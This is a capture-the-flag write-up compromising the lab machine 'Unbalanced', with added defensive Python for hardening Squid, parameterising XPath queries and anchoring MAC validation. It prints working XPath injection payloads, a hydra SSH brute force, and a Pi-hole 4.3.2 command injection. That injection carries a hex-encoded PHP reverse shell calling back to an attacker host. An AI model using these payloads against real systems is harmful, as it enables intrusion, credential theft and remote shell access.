Scanning
Nmap
ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.200 | grep open | awk -F / '{print $1}' ORS=',')
echo $ports && nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.200
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Squid http proxy : Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.
- Add this proxy in FoxyProxy and go to http://10.10.10.200
Error: Access Denied.
- I don't have any host that is allowed through the proxy, so I cannot get much information from here for now.
rsync
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files. It is commonly found on Unix-like operating systems. Rsync is written in C as a single threaded application.
rsync Enumeration
List all modules (shared directories):
rsync 10.10.10.200::
conf_backups EncFS-encrypted configuration backups
Copy conf_backups to the local machine:
rsync -av 10.10.10.200::conf_backups conf_backups
Inside the conf_backups directory:
❯ tree -a conf_backups
conf_backups
├── 0K72OfkNRRx3-f0Y6eQKwnjn
<snippet>
└── ZXUUpn9SCTerl0dinZQYwxrx
0 directories, 75 files
The folder is an EncFS-encrypted backup of system configuration files.
EncFS : EncFS is a Free (LGPL) FUSE-based cryptographic filesystem. It transparently encrypts files, using an arbitrary directory as storage for the encrypted files. … Files are encrypted using a volume key, which is stored either within or outside the encrypted source directory. A password is used to decrypt this key.
With EncFS encryption all file names are changed to random-looking text, and a .encfs6.xml file is created that contains the encryption metadata. Searching on Google, I found that John the Ripper has a Python script that extracts a password hash from the .encfs6.xml file.
Cracking the EncFS-encrypted conf_backups folder
Use encfs2john.py to extract the hash:
python3 /usr/share/john/encfs2john.py dump/conf_backups
dump/conf_backups:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
Crack the hash using john:
john -w=/usr/share/wordlists/rockyou.txt encfs_hash
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
bubblegum (conf_backups)
Session completed
Found password: bubblegum
Decrypting conf_backups requires the encfs tool's encfsctl utility, which decrypts an EncFS filesystem:
encfsctl export conf_backups encfs_decrypt
EncFS Password: bubblegum
❯ tree -a encfs_decrypt
encfs_decrypt
├── 50-localauthority.conf
<snippet>
├── squid.conf
<snippet>
└── xattr.conf
0 directories, 74 files
squid
squid-proxy
From the decrypted config files, grep for htb:
grep -r htb
squid.conf:acl intranet dstdomain -n intranet.unbalanced.htb
Internal host: intranet.unbalanced.htb
- The host is found in squid.conf, and then I recalled that there is a Squid http proxy service running on port 873 on the box.
- I had already added the proxy in my browser, and now I have found a host that is accessible through the proxy.
- I can access intranet.unbalanced.htb through the squid-proxy I set in FoxyProxy, but I don't find anything interesting on the host's web page.
- I can also access squid:CacheManager.
From the decrypted config files, grep for passwd:
grep -r passwd
squid.conf:cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
I found a cachemgr_passwd string in the squid config file. Reading the Squid configuration documentation, I found out that the cachemgr_passwd directive has two parts (from this doc):
Usage: cachemgr_passwd password action action ...
- In the squid config file, cachemgr_passwd specifies passwords for cachemgr operations. It has two parts: the first is the password and the second is the list of actions that are allowed with that password. In this squid config file:
- First, password: Thah$Sh1
- Second, actions: menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
- In the CacheManager documentation I found a tool, squidclient: a command line utility for performing web requests. It also has a special ability to send cache manager requests to Squid proxies.
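Before moving on to squidclient, here is an added example (my own Python, not code from this write-up or from the Squid project) that audits a squid.conf for the two things this section turns on: a cachemgr_passwd directive that stores a plaintext password and unlocks reports such as fqdncache, and the absence of an 'http_access deny manager' rule. The sample config is constructed from the single directive recovered above plus assumed http_access lines in the shape of Squid's default config; the set of actions treated as sensitive is my own selection.

```python
from typing import List, Tuple

# Constructed sample: the cachemgr_passwd line recovered from the backup above,
# plus assumed http_access lines in the shape of Squid's default config.
SAMPLE_SQUID_CONF = """\
acl intranet dstdomain -n intranet.unbalanced.htb
http_access allow localhost manager
http_access deny manager
http_access allow intranet
cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
"""

# Hardened counterpart (constructed): manager reachable only from localhost,
# every password-protected action switched off.
HARDENED_SQUID_CONF = """\
http_access allow localhost manager
http_access deny manager
cachemgr_passwd disable all
"""

# Manager reports that expose internal names, addresses or live connections.
# This list is my own selection, not an official Squid classification.
SENSITIVE_ACTIONS = {"fqdncache", "ipcache", "config", "objects",
                     "vm_objects", "pconn", "filedescriptors"}


def _tokens(conf: str) -> List[List[str]]:
    """Split a squid.conf into token lists, dropping comments and blank lines."""
    out = []
    for raw in conf.splitlines():
        parts = raw.split("#", 1)[0].split()
        if parts:
            out.append(parts)
    return out


def parse_cachemgr_passwd(conf: str) -> List[Tuple[str, List[str]]]:
    """Return (password, actions) for every cachemgr_passwd directive."""
    return [(p[1], p[2:]) for p in _tokens(conf)
            if p[0] == "cachemgr_passwd" and len(p) >= 3]


def audit_squid_conf(conf: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    toks = _tokens(conf)
    if not any(p[:3] == ["http_access", "deny", "manager"] for p in toks):
        findings.append("no 'http_access deny manager' rule: any client the proxy "
                        "accepts can reach the cache manager")
    for password, actions in parse_cachemgr_passwd(conf):
        if password == "disable":
            continue                       # these actions are switched off entirely
        if "all" in actions:
            exposed = sorted(SENSITIVE_ACTIONS)
        else:
            exposed = sorted(SENSITIVE_ACTIONS.intersection(actions))
        if password == "none":
            if exposed:
                findings.append("cachemgr_passwd none: unlocked without a password: "
                                + ", ".join(exposed))
        else:
            findings.append("cachemgr_passwd stores a plaintext password; it leaks "
                            "with every copy or backup of squid.conf")
            if exposed:
                findings.append("that password unlocks sensitive manager reports: "
                                + ", ".join(exposed))
    return findings


if __name__ == "__main__":
    for name, conf in (("recovered", SAMPLE_SQUID_CONF), ("hardened", HARDENED_SQUID_CONF)):
        print(name, audit_squid_conf(conf) or ["no findings"])
```

The audit is deliberately line-based: squid.conf is one directive per line, and the first matching http_access rule wins, so an explicit deny for the manager ACL is the check worth making before anything else. Note that the recovered config would fail the audit even with the manager limited to localhost, because the password itself travelled with the backup.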
User Exploit
squidclient
- From all the actions specified in the config file I found some useful ones; here is a good blog on CacheManager actions.
Action: fqdncache: this is a report of the Squid DNS cache for IP address resolution, essentially an IP-to-hostname table.
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Sat, 21 Nov 2020 04:52:08 GMT
Content-Type: text/plain;charset=utf-8
Expires: Sat, 21 Nov 2020 04:52:08 GMT
Last-Modified: Sat, 21 Nov 2020 04:52:08 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close
FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 10
FQDNcache Requests: 19292
FQDNcache Hits: 0
FQDNcache Negative Hits: 8790
FQDNcache Misses: 10502
FQDN Cache Contents:
Address Flg TTL Cnt Hostnames
10.10.14.3 N -36278 0
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters
10.10.15.75 N -47928 0
Found 3 working host IPs:
172.31.179.2
172.31.179.3
172.17.0.1
But these IPs all go to the same place (/intranet.php) that intranet.unbalanced.htb, which I found before, goes to.
- All hosts have the same login page with username and password fields.
- I tried different types of injection. I created a simple Burp Intruder list of different injections from PayloadsAllTheThings, but none of them worked on any of these hosts.
For intercepting requests to the internal hosts I set the squid proxy http://10.10.10.200:3128 as the upstream proxy in Burp Suite. Eventually I tried 172.31.179.1 and it gives an error:
Host temporarily taken out of load balancing for security maintenance.
- I tried 172.31.179.1/intranet.php, as all hosts redirected there, and I got that same login page.
- I ran my intruder list again, and this time I found a working injection in the password field.
XPath injection
The password field is vulnerable to XPath injection.
XPath payload:
' or '1'='1
This returns some employee details:
rita Rita Fubelli rita@unbalanced.htb Role: HR Manager
jim Jim Mickelson jim@unbalanced.htb Role: Web Designer
bryan Bryan Angstrom bryan@unbalanced.htb Role: System Administrator
sarah Sarah Goodman sarah@unbalanced.htb Role: Team Leader
After some time in Burp Suite testing the XPath injection, I found a way to extract password strings using XPath injection like SQLi.
Payload:
' or Username='bryan'and substring(Password,$i,1)='$c
I created a brute-force script that extracts passwords from the database using the XPath vulnerability. The payload works like a SQL boolean-based injection: when the character at position $i of the password is $c, the page returns the user's contact details, and otherwise the page returns "Invalid credentials". Here i is an integer position and c is a character. It takes some time to extract all passwords from the database.
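The extraction above works because the application splices the submitted username and password straight into the XPath query text. As an added example (my own Python, not the site's code; the query shape and the Employee element name are assumptions, while the Username and Password field names come from the payload above), the code below shows the unsafe query builder beside one that encodes each value as an XPath 1.0 string literal, plus a simple indicator that can be run over request parameters in access logs to spot probes of the kind used here.

```python
import re


def xpath_string_literal(value: str) -> str:
    """Encode any string as an XPath 1.0 string literal.

    XPath 1.0 has no escape character inside quoted strings, so a value that
    holds both quote kinds is split on the single quotes and rebuilt with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = []
    for piece in value.split("'"):
        if piece:
            parts.append(f"'{piece}'")
        parts.append('"\'"')          # the single quote that was split out
    parts.pop()                       # no separator after the final piece
    return "concat(" + ", ".join(parts) + ")"


def login_query_unsafe(username: str, password: str) -> str:
    """Assumed shape of the vulnerable query: raw input spliced into the expression."""
    return f"//Employee[Username='{username}' and Password='{password}']"


def login_query_safe(username: str, password: str) -> str:
    """Same lookup, but each value is a literal: a quote in the input cannot end the string."""
    return ("//Employee[Username=" + xpath_string_literal(username)
            + " and Password=" + xpath_string_literal(password) + "]")


# A quote followed by a boolean operator, or a call to substring(): the two
# tell-tales of the probes used in this section.
_PROBE = re.compile(r"""['"]\s*(?:or|and)\s|substring\s*\(""", re.IGNORECASE)


def looks_like_xpath_probe(value: str) -> bool:
    """Cheap log- or WAF-side indicator; returns True for the two payloads above."""
    return _PROBE.search(value) is not None


if __name__ == "__main__":
    probe = "' or '1'='1"
    print(login_query_unsafe("bryan", probe))   # the quote ends the literal, 'or' becomes an operator
    print(login_query_safe("bryan", probe))     # the whole probe is one double-quoted literal
    print(looks_like_xpath_probe(probe), looks_like_xpath_probe("sarah4evah"))
```

Where the XPath library supports variable binding (lxml's XPath does, via keyword arguments), binding is preferable to building literals by hand; the literal encoder is the fallback for engines that only take a query string.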
Creds:
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah
SSH brute force
hydra -L usernames -P password 10.10.10.200 -t 4 ssh
[DATA] attacking ssh://10.10.10.200:22/
[22][ssh] host: 10.10.10.200 login: bryan password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
SSH creds: bryan:ireallyl0vebubblegum!!!
User: bryan shell
ssh bryan@10.10.10.200
bryan@10.10.10.200's password: ireallyl0vebubblegum!!!
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
bryan@unbalanced:~$ cat user.txt
f91a0994************************
Privesc enumeration
In bryan's home folder there is a TODO file, and inside it a service is listed that is running on localhost:
###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
Pi-hole : Pi-hole is a Linux network-level advertisement and Internet tracker blocking application which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network.
Enumerating Pi-hole
Check the service ports:
bryan@unbalanced:~$ ss -lnpt | grep 127.0.0.1
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 127.0.0.1:5553 0.0.0.0:*
Port 5553 is not responding.
Port 8080 gives an error:
[ERROR]: Unable to parse results from queryads.php: Unhandled error message (Invalid domain!)
Set up an SSH tunnel to reach it.
Gobuster
gobuster dir -u http://127.0.0.1:8080/ -w words -b 200
I use -b 200 to ignore all 200 responses, because with the server's custom error page every request returns 200.
Found: /admin (Status: 301)
From http://127.0.0.1:8080/admin/ I got the Pi-hole admin panel. I also found the Pi-hole docker's IP, which is accessible from the squid-proxy:
linpeas scan:
[+] Networks and neighbours
10.10.10.2 dev ens160 lladdr 00:50:56:b9:16:1a REACHABLE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
fe80::250:56ff:feb9:161a dev ens160 lladdr 00:50:56:b9:16:1a router STALE
IP address HW type Flags HW address Mask Device
10.10.10.2 0x1 0x2 00:50:56:b9:16:1a * ens160
172.31.179.1 0x1 0x2 02:42:ac:1f:b3:01 * br-742fc4eb92b1
172.31.11.3 0x1 0x2 02:42:ac:1f:0b:03 * br-742fc4eb92b1
These IPs are in the ARP table:
cat /proc/net/arp
IP address HW type Flags HW address Mask Device
10.10.10.2 0x1 0x2 00:50:56:b9:16:1a * ens160
172.31.179.1 0x1 0x2 02:42:ac:1f:b3:01 * br-742fc4eb92b1
172.31.11.3 0x1 0x2 02:42:ac:1f:0b:03 * br-742fc4e
IP 172.31.179.1 is the same XPath-vulnerable host.
IP 172.31.11.3 is the Pi-hole docker IP.
Accessing 172.31.11.3 from the squid-proxy gives the Pi-hole admin console, and here I found that the Pi-hole version is 4.3.2:
Pi-hole Version v4.3.2 Web Interface Version v4.3 FTL Version v4.3.1
On the console I got the Pi-hole hostname:
pihole.unbalanced.htb
Login with the temporary password admin: login successful.
127.0.0.1 and 172.31.11.3 give the same result because the Pi-hole instance is accessible both locally and from the squid-proxy.
Searching for a Pi-hole 4.3.2 vulnerability, I found an exploit on ExploitDB.
Exploiting Pi-hole
Exploit impact: Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.
Exploit reason: when defining the MAC address while configuring DHCP leases, Pi-hole does not validate the MAC address properly, so one can manipulate that MAC address field, put a reverse shell in it and execute it.
Refer to the natedotred blog for the complete exploitation process.
Go to Pi-hole Web Console » Admin Panel » Settings (login with password admin) » DHCP tab:
http://172.31.11.3/admin/settings.php?tab=piholedhcp
A legitimate MAC address has the following format:
aaaaaaaaaaaa
The MAC address input can be tampered with to execute arbitrary code:
aaaaaaaaaaaa$PATH
Configure a DHCP lease with the tampered MAC:
MAC address IP address Hostname
aaaaaaaaaaaa$PATH 10.10.10.200 10.10.10.200
Got output like this:
MAC address IP address Hostname
AAAAAAAAAAAA/opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 10.10.10.200 10.10.10.200
Pi-hole's savesettings.php is responsible for this vulnerability.
Lines 53-57: the application first validates the MAC address format using the preg_match() function.
function validMAC($mac_addr)
{
// Accepted input format: 00:01:02:1A:5F:FF (characters may be lower case)
// The pattern has no ^ and $ anchors, so preg_match() also succeeds when a valid MAC is followed by extra characters.
return (preg_match('/([a-fA-F0-9]{2}[:]?){6}/', $mac_addr) == 1);
}
Lines 542-550: then it checks only for HTML special characters and converts the input to upper case.
$mac = $_POST["AddMAC"];
if(!validMAC($mac))
{
$error .= "MAC address (".htmlspecialchars($mac).") is invalid!<br>";
}
$mac = strtoupper($mac);
Lines 588-592: then it adds the entry to DHCP using a pihole system command.
if(!strlen($error))
{
exec("sudo pihole -a addstaticdhcp ".$mac." ".$ip." ".$hostname);
$success .= "A new static address has been added";
}
Exploit exception: the MAC address input is converted to upper case, so if we put shell code in it, all of the code is converted to upper case. As Linux commands are case sensitive, this would fail.
The way to overcome this difficulty is to make use of environment variables and POSIX shell parameter expansions.
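As an added example (my own Python, not Pi-hole's PHP), the code below reproduces the unanchored validMAC() pattern, shows why aaaaaaaaaaaa$PATH passes it, and puts the two fixes side by side: an anchored pattern that must cover the whole input, and shell-quoting of every argument before it is joined into the pihole command line. The command string follows the exec() call quoted above; the function and constant names are my own.

```python
import re
import shlex

# Same pattern as Pi-hole's validMAC(); re.search mirrors preg_match(), which
# succeeds on a match anywhere in the string.
_UNANCHORED = re.compile(r"([a-fA-F0-9]{2}[:]?){6}")

# Fixed form: the whole input must be six hex pairs, either all colon-separated
# or all joined. (Stricter than the original, which also allowed mixed forms.)
_STRICT = re.compile(r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}|[0-9A-Fa-f]{12}")


def valid_mac_unanchored(mac: str) -> bool:
    """Behaviour of the original check: trailing data after a valid MAC is accepted."""
    return _UNANCHORED.search(mac) is not None


def valid_mac_strict(mac: str) -> bool:
    """fullmatch() requires the pattern to cover the entire input."""
    return _STRICT.fullmatch(mac) is not None


def build_addstaticdhcp(mac: str, ip: str, hostname: str) -> str:
    """Assemble the command line from the exec() call above, with the MAC validated
    and every argument shell-quoted. Raises ValueError instead of building a bad command."""
    if not valid_mac_strict(mac):
        raise ValueError(f"rejected MAC address: {mac!r}")
    args = [mac.upper(), ip, hostname]
    # shlex.quote() wraps anything containing shell metacharacters in single
    # quotes, so even a value like $PATH would reach pihole as literal text.
    return "sudo pihole -a addstaticdhcp " + " ".join(shlex.quote(a) for a in args)


if __name__ == "__main__":
    tampered = "aaaaaaaaaaaa$PATH"
    print("unanchored check accepts tampered input:", valid_mac_unanchored(tampered))
    print("strict check accepts tampered input:    ", valid_mac_strict(tampered))
    print(build_addstaticdhcp("aaaaaaaaaaaa", "10.10.10.200", "10.10.10.200"))
```

The two fixes are independent: anchoring closes the validation gap, while quoting keeps a future validation mistake (in the IP or hostname fields, which this example does not validate) from turning into command injection. The same applies in PHP with escapeshellarg().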
Manual Exploit
Payload encoding
Reverse shell payload: aaaaaaaaaaaa&&php -r '$sock=fsockopen("tun0",4141);exec("/bin/sh -i <&3 >&3 2>&3");'
There are three pieces in the payload.
First, the MAC address aaaaaaaaaaaa, used as it is.
Second, environment variables: in the encoded shell command we define the $P, $H and $R shell parameters, which contain their matching lower-case character, using the following POSIX shell parameter expansions.
Example:
❯ W=${PATH#/???/}
echo $W
bash:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
❯ P=${W%%?????:*}
echo $P
p
All variables:
W=${PATH#/???/}
P=${W%%?????:*}
X=${PATH#/???/??}
H=${X%%???:*}
Z=${PATH#*:/??}
R=${Z%%/*}
And now the payload looks like this: <MAC>&&<variables>
aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS
Here $IFS is the default shell field separator, which is a space.
Third, the reverse shell code 'php -r \'$sock=fsockopen("tun0",4141);exec("/bin/sh -i <&3 >&3 2>&3");\'' in hex-encoded form, inside the PHP function: 'EXEC(HEX2BIN("<shellcode>"));'&&
I use Python to encode the payload into hex:
❯ python2
Python 2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> p = 'php -r \'$sock=fsockopen("tun0",4141);exec("/bin/sh -i <&3 >&3 2>&3");\''
>>> p.encode("hex").upper()
'706870202D72202724736F636B3D66736F636B6F70656E282231302E31302E31342E3437222C34313431293B6578656328222F62696E2F7368202D69203C2633203E263320323E263322293B27'
Final payload : aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("<shellcode>"));'&&
My Payload : aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("706870202D72202724736F636B3D66736F636B6F70656E282231302E31302E31342E3339222C34313431293B6578656328222F62696E2F7368202D69203C2633203E263320323E263322293B27"));'&&
Notes: both the squid-proxy IP 172.31.11.3 and the SSH tunnel on 127.0.0.1:8080 give a reverse shell as www-data.
Root Privesc
The user www-data is able to read the /root directory:
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd /root
$ pwd
/root
$ ls -la
-rw-r--r-- 1 root root 113876 Sep 20 2019 ph_install.sh
-rw-r--r-- 1 root root 485 Apr 6 2020 pihole_config.sh
Inside the pihole_config.sh file:
$ cat pihole_config.sh
#!/bin/bash
# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb
# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c
# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1
# Set privacy level
/usr/local/bin/pihole -a -l 4
# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
There is a Pi-hole admin password, bUbBl3gUm$43v3Ry0n3!, and su with this password from bryan's SSH shell worked and gave a root shell:
bryan@unbalanced:~$ su - root
Password: bUbBl3gUm$43v3Ry0n3!
root@unbalanced:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:~# cat root.txt
8c97fa50************************